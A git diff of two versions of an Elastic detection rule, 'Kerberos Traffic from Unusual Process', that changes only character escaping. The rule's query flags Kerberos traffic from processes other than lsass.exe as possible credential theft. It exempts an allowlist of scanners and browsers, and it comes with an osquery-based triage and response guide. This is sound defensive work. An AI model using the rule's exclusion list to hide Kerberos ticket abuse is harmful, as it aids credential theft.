@@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong 
authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve 
All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", 
@@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json index cc84f7af7d4..1e02eeef934 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_106.json 
@@ -16,8 +16,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong 
authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve 
All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n 
\"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", 
@@ -72,7 +72,7 @@
 ],
 "risk_score": 47,
 "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782",
